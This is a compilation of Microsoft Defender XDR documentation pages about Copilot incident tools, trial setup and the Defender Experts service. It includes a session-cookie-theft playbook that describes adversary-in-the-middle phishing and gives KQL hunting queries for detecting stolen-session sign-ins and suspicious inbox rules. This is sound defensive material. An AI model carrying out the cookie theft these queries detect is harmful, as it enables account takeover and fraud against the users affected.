-Responding to incidents in the Microsoft Defender portal often requires familiarity with the portal's available actions to stop attacks. In addition, new incident responders might have different ideas of where and how to start responding to incidents. The guided response capability of Copilot in Defender allows incident response teams at all levels to confidently and quickly apply response actions to resolve incidents with ease.
-
-Guided responses are available in the Microsoft Defender portal through the [Copilot for Security license](/security-copilot/faq-security-copilot). Guided responses are also available in the Copilot for Security standalone experience through the Defender XDR plugin.
-
-This guide outlines how to access the guided response capability, including information on providing feedback about the responses.
-
-## Apply guided responses to resolve incidents
-
-Guided responses recommend actions in the following categories:
--- Triage - includes a recommendation to classify incidents as informational, true positive, or false positive-- Containment - includes recommended actions to contain an incident-- Investigation - includes recommended actions for further investigation-- Remediation - includes recommended response actions to apply to specific entities involved in an incident-
-Each card contains information about the recommended action, including the entity where the action needs to be applied and why the action is recommended. The cards also emphasize when a recommended action was done by automated investigation like [attack disruption](automatic-attack-disruption.md) or [automated investigation response](m365d-autoir.md).
-
-The guided response cards can be sorted based on the available status for each card. You can select a specific status when viewing the guided responses by clicking on **Status** and selecting the appropriate status you want to view. All guided response cards regardless of status are shown by default.
--
-To use guided responses, perform the following steps:
-
-1. Open an incident page. Copilot automatically generates guided responses upon opening an incident page. The Copilot pane appears on the right side of the incident page, showing the guided response cards.
-
- :::image type="content" source="../../media/copilot-in-defender/guided-response/copilot-defender-guided-response-small.png" alt-text="Screenshot highlighting the Copilot pane with the guided responses in the Microsoft Defender incident page." lightbox="../../media/copilot-in-defender/guided-response/copilot-defender-guided-response.png":::
-
-2. Review each card before applying the recommendations. Select the More actions ellipsis (...) on top of a response card to view the options available for each recommendation. Here are some examples.
-
- ![Screenshot highlighting the options available to users in a guided response card in the Copilot side panel.](../../media/copilot-in-defender/guided-response/copilot-defender-guided-response-more-actions1.png)
-
- ![Screenshot highlighting the options available to users in an automation response card in the Copilot pane in Microsoft Defender XDR.](../../media/copilot-in-defender/guided-response/copilot-defender-guided-response-more-actions2.png)
-
-3. To apply an action, select the desired action found on each card. The guided response action on each card is tailored to the type of incident and the specific entity involved.
-
- :::image type="content" source="../../media/copilot-in-defender/guided-response/copilot-defender-guided-response-actions-small.png" alt-text="Screenshot of the guided response cards in the Copilot pane in Microsoft Defender." lightbox="../../media/copilot-in-defender/guided-response/copilot-defender-guided-response-actions.png":::
-
-4. You can provide feedback to each response card to continuously enhance future responses from Copilot. To provide feedback, select the feedback icon ![Screenshot of the feedback icon for Copilot in Defender cards](../../media/copilot-in-defender/copilot-defender-feedback.png) found on the bottom right of each card.
-
-> [!NOTE]
-> Grayed out action buttons mean these actions are limited by your permission. [Refer to the unified role-based access (RBAC) permissions](manage-rbac.md) page for more information.
-
-Copilot in Defender supports incident response teams by enabling analysts to gain more context about response actions with additional insights. For remediation responses, incident response teams can view additional information with options like **View similar incidents** or **View similar emails**.
-
-The **View similar incidents** action becomes available when there are other incidents within the organization that are similar to the current incident. The Similar incidents tab lists similar incidents that you can review. Microsoft Defender automatically identifies similar incidents within the organization through machine learning. Incident response teams can use the information from these similar incidents to classify incidents and further review the actions done in those similar incidents.
-
-The **View similar emails** action, which is specific to phishing incidents, takes you to the [advanced hunting](advanced-hunting-overview.md) page, where a KQL query to list similar emails within the organization is automatically generated. This automatic query generation related to an incident helps incident response teams further investigate other emails that might be related to the incident. You can review the query and modify it as needed.
-
-## See also
--- [Summarize an incident](security-copilot-m365d-incident-summary.md)-- [Analyze files](copilot-in-defender-file-analysis.md)-- [Run script analysis](security-copilot-m365d-script-analysis.md)-- [Create an incident report](security-copilot-m365d-create-incident-report.md)-- [Generate KQL queries](advanced-hunting-security-copilot.md)-- [Get started with Microsoft Copilot for Security](/security-copilot/get-started-security-copilot)-- [Learn about other Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-- Know more about [preinstalled plugins in Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins)-
security Security Copilot M365d Incident Summary https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/security-copilot-m365d-incident-summary.md
- Title: Summarize incidents with Microsoft Copilot in Microsoft Defender
-description: Generate incident summaries with Microsoft Copilot embedded in Microsoft Defender.
-keywords: security copilot, Microsoft Defender XDR, embedded experience, incident summary, script analyzer, script analysis, query assistant, m365, guided response, incident response playbooks, incident response, summary, summarize incident, summarize incidents, incident overview, write incident summary, Microsoft Copilot for Security, Copilot in Defender, Microsoft Defender
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - tier1
- - security-copilot
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Summarize an incident with Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-Microsoft Defender XDR applies the capabilities of [Copilot for Security](/security-copilot/microsoft-security-copilot) to summarize incidents, delivering impactful information and insights to simplify investigation tasks. Attack investigation is a crucial step for incident response teams to successfully defend an organization against further damage from a cyber threat. Investigations can oftentimes be time-consuming as it involves numerous steps. Incident response teams need to understand how the attack happened: sort through numerous alerts, identify which assets and entities are involved, and assess the scope and impact of an attack.
-
-Incident responders can easily gain the right context to investigate and remediate incidents through Defender XDR's correlation capabilities and Copilot for Security's AI-powered data processing and contextualization. With an incident summary, responders can quickly get important information to help in their investigation.
-
-The incident summary capability is available in the Microsoft Defender portal through the [Copilot for Security license](/security-copilot/faq-security-copilot). This capability is also available in the Copilot for Security standalone experience through the Microsoft Defender XDR plugin.
-
-This guide outlines what to expect and how to access the summarizing capability of Copilot in Defender, including information on providing feedback.
-
-## Summarize an incident
-
-Incidents containing up to 100 alerts can be summarized into one incident summary. An incident summary, depending on the availability of the data, includes the following:
--- The time and date when an attack started.-- The entity or asset where the attack started.-- A summary of timelines of how the attack unfolded.-- The assets involved in the attack.-- Indicators of compromise (IoCs).-- Names of [threat actors](/microsoft-365/security/intelligence/microsoft-threat-actor-naming) involved.-
-To summarize an incident, perform the following steps:
-
-1. Open an incident page. Copilot automatically creates an incident summary upon opening the page. You can stop the summary creation by selecting **Cancel** or restart creation by selecting **Regenerate**.
-
-2. The incident summary card loads on the Copilot pane. Review the generated summary on the card.
- :::image type="content" source="../../media/copilot-in-defender/incident-summary/copilot-defender-incident-summary-small.png" alt-text="Screenshot of the incident summary card on the Copilot pane as seen in the Microsoft Defender incident page." lightbox="../../media/copilot-in-defender/incident-summary/copilot-defender-incident-summary.png":::
- > [!TIP]
- > You can navigate to a file, IP, or URL page from the Copilot results pane by clicking on the evidence in the results.
-3. Select the **More actions** ellipsis (...) at the top of the incident summary card to copy or regenerate the summary, or view the summary in the Copilot for Security portal. Selecting **Open in Copilot for Security** opens a new tab to the Copilot for Security standalone portal where you can input prompts and access other plugins.
- :::image type="content" source="../../media/copilot-in-defender/incident-summary/copilot-defender-incident-summary-more-actions.png" alt-text="Screenshot highlighting the actions available on the incident summary card." lightbox="../../media/copilot-in-defender/incident-summary/copilot-defender-incident-summary-more-actions.png":::
-4. Review the summary and use the information to guide your investigation and response to the incident. You can provide feedback on the summary by selecting the feedback icon ![Screenshot of the feedback icon for Copilot in Defender cards](../../media/copilot-in-defender/copilot-defender-feedback.png) found on the bottom of the Copilot pane.
-
-## See also
--- [Run script analysis](security-copilot-m365d-script-analysis.md)-- [Analyze files](copilot-in-defender-file-analysis.md)-- [Generate device summary](copilot-in-defender-device-summary.md)-- [Use guided responses when responding to threats](security-copilot-m365d-guided-response.md)-- [Generate KQL queries](advanced-hunting-security-copilot.md)-- [Create incident reports](security-copilot-m365d-create-incident-report.md)-- [Get started with Microsoft Copilot for Security](/security-copilot/get-started-security-copilot)-- [Learn about other Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-- Know more about [preinstalled plugins in Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins)-- [Investigate incidents in Microsoft Defender XDR](investigate-incidents.md)-
security Security Copilot M365d Script Analysis https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/security-copilot-m365d-script-analysis.md
- Title: Script analysis with Microsoft Copilot in Microsoft Defender
-description: Use Microsoft Copilot script analysis in Microsoft Defender to investigate scripts and command lines.
-keywords: security copilot, Microsoft Defender XDR, embedded experience, incident summary, script analyzer, script analysis, query assistant, m365, incident report, guided response, incident response playbooks, incident response, powershell, powershell analysis, bash, batch, bash analysis, batch analysis, code analysis, code analyzer, security copilot script analysis, copilot in security script analysis, security copilot script analysis in Microsoft Defender XDR, Microsoft Copilot for Security, Microsoft Defender, Copilot in Defender
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - tier1
- - security-copilot
-
- - MOE150
- - MET150
Previously updated : 04/01/2024--
-# Script analysis with Microsoft Copilot in Microsoft Defender
--
-**Applies to:**
--- Microsoft Defender XDR-- Microsoft Defender unified security operations center (SOC) platform-
-Through AI-powered investigation capabilities from [Microsoft Copilot for Security](/security-copilot/microsoft-security-copilot) in the Microsoft Defender portal, security teams can speed up their analysis of malicious or suspicious scripts and command lines.
-
-Most complex and sophisticated attacks like [ransomware](/security/ransomware) evade detection through numerous ways, including the use of scripts and PowerShell command lines. Moreover, these scripts are often obfuscated, which adds to the complexity of detection and analysis. Security operations teams need to quickly analyze scripts to understand capabilities and apply appropriate mitigation, immediately stopping attacks from progressing further within a network.
-
-The script analysis capability provides security teams added capacity to inspect scripts without using external tools. This capability also reduces complexity of analysis, minimizing challenges and allowing security teams to quickly assess and identify a script as malicious or benign. Script analysis is also available in the Copilot for Security standalone experience through the Microsoft Defender XDR plugin. Know more about [preinstalled plugins in Copilot for Security](/security-copilot/manage-plugins#preinstalled-plugins).
-
-This guide describes what the script analysis capability is and how it works, including how you can provide feedback on the results generated.
-
-## Analyze a script
-
-You can access the script analysis capability within the attack story below the incident graph on an incident page and in the [device timeline](/microsoft-365/security/defender-endpoint/device-timeline-event-flag).
-
-To begin analysis, perform the following steps:
-
-1. Open an incident page then select an item on the left pane to open the attack story below the incident graph. Within the attack story, select an event with a script or command line that you want to analyze. Click **Analyze** to start the analysis.
-
- :::image type="content" source="../../media/copilot-in-defender/script-analyzer/copilot-defender-script-analysis-incident-small.png" alt-text="Screenshot highlighting the script analysis button in the attack story view." lightbox="../../media/copilot-in-defender/script-analyzer/copilot-defender-script-analysis-incident.png":::
-
- Alternately, you can select an event to inspect in the device timeline view. On the file details pane, select **Analyze** to run the script analysis capability.
-
- :::image type="content" source="../../media/copilot-in-defender/script-analyzer/copilot-defender-script-device-timeline-small.png" alt-text="Screenshot highlighting the Analyze button in the device timeline." lightbox="../../media/copilot-in-defender/script-analyzer/copilot-defender-script-device-timeline.png":::
-
-2. Copilot runs script analysis and displays the results in the Copilot pane. Select **Show code** to expand the script, or **Hide code** to close the expansion.
-
- :::image type="content" source="../../media/copilot-in-defender/script-analyzer/copilot-defender-script-analysis-results-small.png" alt-text="Screenshot of the Copilot pane with script analysis results in the Microsoft Defender XDR incident page." lightbox="../../media/copilot-in-defender/script-analyzer/copilot-defender-script-analysis-results.png":::
-
-3. Select the **More actions** ellipsis (...) on the upper right of the script analysis card to copy or regenerate the results, or view the results in the Copilot for Security standalone experience. Selecting **Open in Copilot for Security** opens a new tab to the Copilot standalone portal where you can input prompts and access other plugins.
-
- ![Screenshot highlighting the More actions option in the Copilot script analysis card.](../../media/copilot-in-defender/script-analyzer/copilot-defender-script-analysis-more-actions.png)
-
-4. Review the results. You can provide feedback on the results by selecting the feedback icon ![Screenshot of the feedback icon for Copilot in Defender cards.](../../media/copilot-in-defender/copilot-defender-feedback.png) found at the end of the script analysis card.
-
-## See also
--- [Analyze files](copilot-in-defender-file-analysis.md)-- [Generate device summary](copilot-in-defender-device-summary.md)-- [Respond to incidents using guided responses](security-copilot-m365d-guided-response.md)-- [Generate KQL queries](advanced-hunting-security-copilot.md)-- [Create an incident report](security-copilot-m365d-create-incident-report.md)-- [Get started with Microsoft Copilot for Security](/security-copilot/get-started-security-copilot)-- [Learn about other Copilot for Security embedded experiences](/security-copilot/experiences-security-copilot)-
security Session Cookie Theft Alert https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/session-cookie-theft-alert.md
- Title: Alert grading for session cookie theft alert
-description: Review, manage and grade the session cookie theft alert as True Positive (TP) or False Positive (FP), and if there is TP, take recommended actions to remediate the attack and mitigate the security risks arising because of it.
-keywords: incidents, alerts, investigate, analyze, response, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, cookie theft, AiTM, Attacker-in-the-middle, Adversary-in-the-middle, session theft, aitm cookie theft, aitm session theft.
-
-ms.sitesec: library
-ms.pagetype: security
-- NOCSH------ m365-security-- tier3---- autoir-- admindeeplinkDEFENDER- Previously updated : 10/18/2022--
-# Alert grading for session cookie theft alert
--
-**Applies to:**
-- Microsoft Defender XDR-
-This article contains information about alert grading for Session Cookie theft alerts in Microsoft Defender XDR:
--- **Stolen session cookie was used**-- **Authentication request from AiTM-related phishing page**-
-Threat actors have started using innovative ways to infiltrate their target environments. Taking inspiration from Adversary-in-the-Middle attacks, this type of attack uses phishing to steal credentials or their sign-in session in order to carry out malicious actions. BEC campaigns are an excellent example.
-
-This attack works by setting up an intermediate (phishing) site, effectively working as a proxy connection between the user and the legitimate website that the attacker is impersonating. By acting as an intermediary (proxy), the attacker is able to steal the target's password and session cookie. The attacker is therefore able to authenticate to a legitimate session as they're authenticating on behalf of the user.
-
-This playbook helps in investigating cases where suspicious behavior is observed indicative of an Attack-in-the-middle (AiTM) type of attack for cookie theft. This helps security teams like security operations center (SOC) and IT administrators to review, manage and grade the alerts as True Positive (TP) or False Positive (FP), and if it's TP, take recommended actions to remediate the attack and mitigate the security risks arising because of it.
-
-The results of using this playbook are:
--- You have identified the alerts associated with AiTM as malicious (TP) or benign (FP) activities.-- If identified as malicious, you've taken the necessary action to remediate the attack.-
-## Investigating steps
-
-1. Investigate whether the affected user has triggered any other security alerts.
-
- - Focus on alerts that are based on geo-location anomalies for sign ins `[AadSignInEventsBeta or IdentityLogonEvents]`.
- - Investigate for relevant sign-in events by looking at Session ID information `[AadSignInEventsBeta]`.
- - Look for events associated with the identified (stolen) session ID to trace activities performed using the stolen cookie `[CloudAppEvents]`.
- - Look for a time difference between sign-in activities where there's a difference in the geo-location. Multiple sessions shouldn't be possible for the same account with different locations (indicating that the session could be stolen).
- - Check for alerts generated for the account from the corporate host.
- - If the account is compromised, there could be alerts that preceded the compromise indicating attacks, for example, SmartScreen alerts `[NetworkConnectionEvents]`.
-
-2. Investigate suspicious behavior.
- - Look for events indicating unusual patterns to identify suspicious patterns `[CloudAppEvents]` like uncommon properties for Users like ISP/Country/City, etc.
- - Look for events that indicate new or previously unseen activities, such as sign-in attempts [success/failure] into new or never-before-used services, an increase in mail access activity, a change in Azure resource utilization, etc.
- - Inspect any recent modifications in your environment starting from:
- - Office 365 applications (like Exchange online permission changes, mail auto forwarding or redirection)
- - PowerApps (like configuring automated data transmission through PowerAutomate)
- - Azure environments (for example, Azure portal subscription modifications, etc.)
- - SharePoint Online (accesses to multiple sites, or for files that have sensitive content like credential info, or financial statements), etc.)
- - Inspect operations observed in multiple platforms (EXO, SPO, Azure, etc.) within a short time span for the affected user.
- - For example, timelines for audit events of mail read/send operations and Azure resource allocation/modifications (new machine provisioning or adding to Microsoft Entra ID) shouldn't coincide with each other.
-
-3. Investigate possible follow-on attacks. AiTM attacks are usually a means-to-an-end and not the endgame, so inspect your environment for other attacks that follow for the affected accounts.
- - An example would be looking into BEC cases
- - Look for search activities seen on the alerted user account mailbox `[CloudAppEvents]`.
- - Search activities in the mailbox could have keywords observed in financial fraud (for example, invoices, payments, etc.), which are suspicious.
- - Also look for inbox rules created with the intention of moving and marking as read (something along the lines of ActionType in (New-InboxRule, UpdateInboxRules, Set-InboxRule) and RawEventData has_all (MarkAsRead, MoveToFolder, Archive)).
- - Look for mail flow events [EmailEvents & EmailUrlInfo on NetworkMessageId] where the multiple emails are sent with the same Url.
- - Follow up with inspecting whether an increase or a high volume of mail deletion (ActivityType as Trash or Delete) is observed `[CloudAppEvents]` for the mailbox account.
- - Matching behavior could be deemed as highly suspicious.
- - Examine device events for Url events that match click events `[DeviceEvents on AccountName|AccountUpn]` for Office365 emails.
- - Matching the events for click sources (for example, different IP addresses for the same Url) could be an indication of malicious behavior.
-
-## Advanced hunting queries
-
-[Advanced hunting](advanced-hunting-overview.md) is a query-based threat hunting tool that lets you inspect events in your network and locate threat indicators.
-Use these queries to gather more information related to the alert and determine whether the activity is suspicious.
-
-Ensure you have access to the following tables:
--- AadSignInEventsBeta - contains sign-in information for users.-- IdentityLogonEvents - contains logon information for users.-- CloudAppEvents - contains audit logs of user activities.-- EmailEvents - contains mail flow/traffic information.-- EmailUrlInfo - contains Url information contained in emails.-- UrlClickEvents - contains Url click logs for Urls that were clicked in the emails.-- DeviceEvents - contains device activity audit events.-
-Use the query below to identify suspicious logon behavior:
-
-```kusto
-let OfficeHomeSessionIds =
-AADSignInEventsBeta
-| where Timestamp > ago(1d)
-| where ErrorCode == 0
-| where ApplicationId == "4765445b-32c6-49b0-83e6-1d93765276ca" //OfficeHome application
-| where ClientAppUsed == "Browser"
-| where LogonType has "interactiveUser"
-| summarize arg_min(Timestamp, Country) by SessionId;
-AADSignInEventsBeta
-| where Timestamp > ago(1d)
-| where ApplicationId != "4765445b-32c6-49b0-83e6-1d93765276ca"
-| where ClientAppUsed == "Browser"
-| project OtherTimestamp = Timestamp, Application, ApplicationId, AccountObjectId, AccountDisplayName, OtherCountry = Country, SessionId
-| join OfficeHomeSessionIds on SessionId
-| where OtherTimestamp > Timestamp and OtherCountry != Country
-```
-
-Use the below query for identifying uncommon countries/regions:
-
-```kusto
-AADSignInEventsBeta
-| where Timestamp > ago(7d)
-| where ApplicationId == "4765445b-32c6-49b0-83e6-1d93765276ca" //OfficeHome application
-| where ClientAppUsed == "Browser"
-| where LogonType has "interactiveUser"
-| summarize Countries = make_set(Country) by AccountObjectId, AccountDisplayName
-```
-
-Use this query to find new email Inbox rules created during a suspicious sign-in session:
-
-```kusto
-//Find suspicious tokens tagged by AAD "Anomalous Token" alert
-let suspiciousSessionIds = materialize(
-AlertInfo
-| where Timestamp > ago(7d)
-| where Title == "Anomalous Token"
-| join (AlertEvidence | where Timestamp > ago(7d) | where EntityType == "CloudLogonSession") on AlertId
-| project sessionId = todynamic(AdditionalFields).SessionId);
-//Find Inbox rules created during a session that used the anomalous token
-let hasSuspiciousSessionIds = isnotempty(toscalar(suspiciousSessionIds));
-CloudAppEvents
-| where hasSuspiciousSessionIds
-| where Timestamp > ago(21d)
-| where ActionType == "New-InboxRule"
-| where RawEventData.SessionId in (suspiciousSessionIds)
-```
-
-## Recommended actions
-
-Once you determine that the alert activities are malicious, classify those alerts as True Positive (TP) and perform the following actions:
--- Reset the user's account credentials. Also, disable/revoke tokens for the compromised account.-- If the artifacts that were found were related to email, configure block based on Sender IP address and Sender domains.
- - Domains that are typo-squatted might either clear DMARC, DKIM, SPF policies (since the domain is different altogether) or they might return "null results (as it's probably not configured by the threat actor).
-- Block URLs or IP addresses (on the network protection platforms) that were identified as malicious during the investigation.-
-## See also
-
-[From cookie theft to BEC](https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/)
security Setup M365deval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/setup-m365deval.md
- Title: Set up your Microsoft Defender XDR trial lab or pilot environment
-description: Access Microsoft Defender portal then set up your Microsoft Defender XDR trial lab environment
-keywords: Microsoft Defender XDR trial setup, Microsoft Defender XDR pilot setup, try Microsoft Defender XDR, Microsoft Defender XDR evaluation lab setup
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - highpri
- - tier1
- Previously updated : 02/17/2021--
-# Set up your Microsoft Defender XDR trial in a lab environment
--
-**Applies to:**
-- Microsoft Defender XDR-
-This topic guides you to set up a dedicated lab environment. For information on setting up a trial in production, see the new [Evaluate and pilot Microsoft Defender XDR](eval-overview.md) guide.
-
-## Create an Office 365 E5 trial tenant
-
-> [!NOTE]
-> If you already have an existing Office 365 or Microsoft Entra subscription, you can skip the Office 365 E5 trial tenant creation steps.
-
-1. Go to the [Office 365 E5 product portal](https://www.microsoft.com/microsoft-365/business/office-365-enterprise-e5-business-software?activetab=pivot%3aoverviewtab) and select **Free trial**.
-
- :::image type="content" source="../../media/mtp-eval-9.png" alt-text="The Office 365 E5 free trial page" lightbox="../../media/mtp-eval-9.png":::
-
-2. Complete the trial registration by entering your email address (personal or corporate). Click **Set up account**.
-
- :::image type="content" source="../../media/mtp-eval-10.png" alt-text="The Office 365 E5 trial registration setup page" lightbox="../../media/mtp-eval-10.png":::
-
-3. Fill in your first name, last name, business phone number, company name, company size, and country or region.
-
- :::image type="content" source="../../media/mtp-eval-11.png" alt-text="The Office 365 E5 trial registration setup page asking for name, phone, and company details" lightbox="../../media/mtp-eval-11.png":::
-
- > [!NOTE]
- > The country or region you set here determines the data center region your Office 365 will be hosted.
-
-4. Choose your verification preference: through a text message or call. Click **Send Verification Code**.
-
- :::image type="content" source="../../media/mtp-eval-12.png" alt-text="The Office 365 E5 trial registration setup page asking for verification preference" lightbox="../../media/mtp-eval-12.png":::
-
-5. Set the custom domain name for your tenant, then click **Next**.
-
- :::image type="content" source="../../media/mtp-eval-13.png" alt-text="The Office 365 E5 trial registration setup page where you can set up your custom domain name" lightbox="../../media/mtp-eval-13.png":::
-
-6. Set up the first identity, which will be a Global Administrator for the tenant. Fill in **Name** and **Password**. Click **Sign up**.
-
- :::image type="content" source="../../media/mtp-eval-14.png" alt-text="The Office 365 E5 trial registration setup page where you can set your business identity" lightbox="../../media/mtp-eval-14.png":::
-
-7. Click **Go to Setup** to complete the Office 365 E5 trial tenant provisioning.
-
- :::image type="content" source="../../media/mtp-eval-15.png" alt-text="The Office 365 E5 trial registration setup page prompting to click Go to Setup button" lightbox="../../media/mtp-eval-15.png":::
-
-8. Connect your corporate domain to the Office 365 tenant. [Optional] Choose **Connect a domain you already own** and type in your domain name. Click **Next**.
-
- :::image type="content" source="../../media/mtp-eval-16.png" alt-text="The Office 365 E5 Setup page where you should personalize your sign-in and email" lightbox="../../media/mtp-eval-16.png":::
-
-9. Add a TXT or MX record to validate the domain ownership. Once you've added the TXT or MX record to your domain, select **Verify**.
-
- :::image type="content" source="../../media/mtp-eval-17.png" alt-text="The Office 365 E5 setup page where you should add a TXT of MX record to verify your domain" lightbox="../../media/mtp-eval-17.png":::
-
-10. [Optional] Create more user accounts for your tenant. You can skip this step by clicking **Next**.
-
- :::image type="content" source="../../media/mtp-eval-18.png" alt-text="The Office 365 E5 setup page where you can add more users" lightbox="../../media/mtp-eval-18.png":::
-
-11. [Optional] Download Office apps. Click **Next** to skip this step.
-
- :::image type="content" source="../../media/mtp-eval-19.png" alt-text="The Office 365 E5 page where you can install your Office apps" lightbox="../../media/mtp-eval-19.png":::
-
-12. [Optional] Migrate email messages. Again, you can skip this step.
-
- :::image type="content" source="../../media/mtp-eval-20.png" alt-text="The Office 365 E5 where you can set whether to migrate email messages or not" lightbox="../../media/mtp-eval-20.png":::
-
-13. Choose online services. Select **Exchange** and click **Next**.
-
- :::image type="content" source="../../media/mtp-eval-21.png" alt-text="The Office 365 E5 where you can choose your online services" lightbox="../../media/mtp-eval-21.png":::
-
-14. Add MX, CNAME, and TXT records to your domain. When completed, select **Verify**.
-
- :::image type="content" source="../../media/mtp-eval-22.png" alt-text="The Office 365 E5 here you can add your DNS records" lightbox="../../media/mtp-eval-22.png":::
-
-15. Congratulations, you have completed the provisioning of your Office 365 tenant.
-
- :::image type="content" source="../../media/mtp-eval-23.png" alt-text="The Office 365 E5 setup completion confirmation page" lightbox="../../media/mtp-eval-23.png":::
-
-## Enable Microsoft 365 trial subscription
-
-> [!NOTE]
-> Signing up for a trial gives you 25 user licenses to use for a month. See [Try or buy a Microsoft 365 subscription](../../commerce/try-or-buy-microsoft-365.md) for details.
-
-1. From [Microsoft 365 Admin Center](https://admin.microsoft.com/), click **Billing** and then navigate to **Purchase services**.
-
-2. Select **Microsoft 365 E5** and click **Start free trial**.
-
- :::image type="content" source="../../media/mtp-eval-24.png" alt-text="The Microsoft 365 E5 Start free trial page" lightbox="../../media/mtp-eval-24.png":::
-
-3. Choose your verification preference: through a text message or call. Once you have decided, enter the phone number, select **Text me** or **Call me** depending on your selection.
-
- :::image type="content" source="../../media/mtp-eval-25.png" alt-text="The Microsoft 365 E5 Start free trial page asking for contact details to send code to prove you are not a robot" lightbox="../../media/mtp-eval-25.png":::
-
-4. Enter the verification code and click **Start your free trial**.
-
- :::image type="content" source="../../media/mtp-eval-26.png" alt-text="The Microsoft 365 E5 Start free trial page where you can fill out verification code the system sent to prove you are not a robot" lightbox="../../media/mtp-eval-26.png":::
-
-5. Click **Try now** to confirm your Microsoft 365 E5 trial.
-
- :::image type="content" source="../../media/mtp-eval-27.png" alt-text="The Microsoft 365 E5 Start free trial page where you should clock the Try now button to start" lightbox="../../media/mtp-eval-27.png":::
-
-6. Go to the **Microsoft 365 Admin Center** > **Users** > **Active users**. Select your user account, select **Manage product licenses**, then swap the license from Office 365 E5 to **Microsoft 365 E5**. Click **Save**.
-
- :::image type="content" source="../../media/mtp-eval-28.png" alt-text="The Microsoft 365 Admin Center page where you can select the Microsoft 365 E5 license" lightbox="../../media/mtp-eval-28.png":::
-
-7. Select the global administrator account again then click **Manage username**.
-
- :::image type="content" source="../../media/mtp-eval-29.png" alt-text="The Microsoft 365 Admin Center page where you can select Account and Manage username" lightbox="../../media/mtp-eval-29.png":::
-
-8. [Optional] Change the domain from *onmicrosoft.com* to your own domainΓÇödepending on what you chose on the previous steps. Click **Save changes**.
-
- :::image type="content" source="../../media/mtp-eval-30.png" alt-text="The Microsoft 365 Admin Center page where you can change your domain preference" lightbox="../../media/mtp-eval-30.png":::
-
-## Next step
-
-|[Phase 3: Configure & Onboard](config-m365d-eval.md) | Configure each Microsoft Defender XDR pillar for your Microsoft Defender XDR trial lab or pilot environment and onboard your endpoints.
-|:-|:--|
security Start Using Mdex Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/start-using-mdex-xdr.md
- Title: How to use the Microsoft Defender Experts for XDR service-
-description: Defender Experts for XDR helps prioritize and customize recommendations to fit your environment
-keywords: XDR, Xtended detection and response, defender experts for xdr, Microsoft Defender Experts for XDR, managed threat hunting, managed detection and response (MDR) service, service delivery manager, Managed response in Teams, real-time visibility with XDR experts, threat hunting and analysis, incidents by category, impacted assets
--
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security
- - tier1
- - essentials-manage
- Previously updated : 01/29/2024--
-# Start using Defender Experts for XDR service
-
-**Applies to:**
--- [Microsoft Defender XDR](microsoft-365-defender.md)-
-After you completed the [onboarding steps and readiness checks](get-started-xdr.md) for Microsoft Defender Experts for XDR, our experts will start monitoring your environment to streamline the service so we can perform comprehensive service on your behalf. During this stage, our experts identify latent threats, sources of risk, and normal activity.
-
-Once our experts begin to perform comprehensive response work on your behalf, you'll start receiving notifications about incidents that require remediation steps and targeted recommendations on critical incidents. You can also chat with our experts or your service delivery managers (SDMs) regarding important queries and regular business and security posture reviews and view real-time reports on the number of incidents we've investigated and resolved on your behalf.
-
-## Managed detection and response
-
-Through a combination of automation and human expertise, Defender Experts for XDR triages Microsoft Defender XDR incidents, prioritizes them on your behalf, filters out the noise, carries out detailed investigations, and provides actionable managed response to your security operations center (SOC) teams.
-
-### Incident updates
-
-Once our experts start investigating an incident, the incident's **Assigned to** and **Status** fields are updated to _Defender Experts_ and _In progress_, respectively.
-
-When our experts conclude their investigation on an incident, the incident's **Classification** field is updated to one of the following, depending on the experts' findings:
--- True Positive-- False Positive-- Informational, Expected Activity-
-The **Determination** field corresponding to each classification is also updated to provide more insights on the findings that led our experts to determine the said classification.
--
-If an incident is classified as _False Positive_ or _Informational_, _Expected Activity_, then the incident's **Status** field gets updated to _Resolved_. Our experts then conclude their work on this incident and the **Assigned to** field gets updated to _Unassigned_. Our experts may share updates from their investigation and their conclusion when resolving an incident. These updates are posted in the incident's **Comments and history** flyout panel.
-
-> [!NOTE]
-> Incident comments are one-way posts. Defender Experts can't respond to any comments or questions you add in the **Comments and history** panel. For more information about how to correspond with our experts, see [Communicating with experts in the Microsoft Defender Experts for XDR service](communicate-defender-experts-xdr.md).
-
-Otherwise, if an incident is classified as _True Positive_, our experts then identify the required response actions that need to be performed. The method in which the actions are performed depends on the permissions and access levels you have given the Defender Experts for XDR service. [Learn more about granting permissions to our experts](get-started-xdr.md#grant-permissions-to-our-experts).
--- If you have granted Defender Experts for XDR the recommended Security Operator access permissions, our experts could perform the required response actions on the incident on your behalf. These actions, along with an **Investigation summary**, show up in the incident's [Managed response](#how-to-use-managed-response-in-microsoft-365-defender) flyout panel in your Microsoft Defender portal for you or your SOC team to review. All actions that are completed by Defender Experts for XDR appear under the **Completed actions** section. Any pending actions that require you or you SOC team to complete are listed under the **Pending actions** section. For more information, see the [Actions](#actions) section. Once our experts have taken all the necessary actions on the incident, its **Status** field is then updated to _Resolved_ and the **Assigned to** field is updated to _Unassigned_.--- If you have granted Defender Experts for XDR the default Security Reader access, then the required response actions, along with an **Investigation summary**, show up in the incident's **Managed response** flyout panel under the **Pending actions** section in your Microsoft Defender portal for you or your SOC team to perform. For more information, see the [Actions](#actions) section. To identify this handover, the incident's **Status** field is updated to _Awaiting Customer Action_ and the **Assigned to** field is updated to _Customer_.-
-You can check the number of incidents that require your action in the Defender Experts banner at the top of the Microsoft Defender homepage.
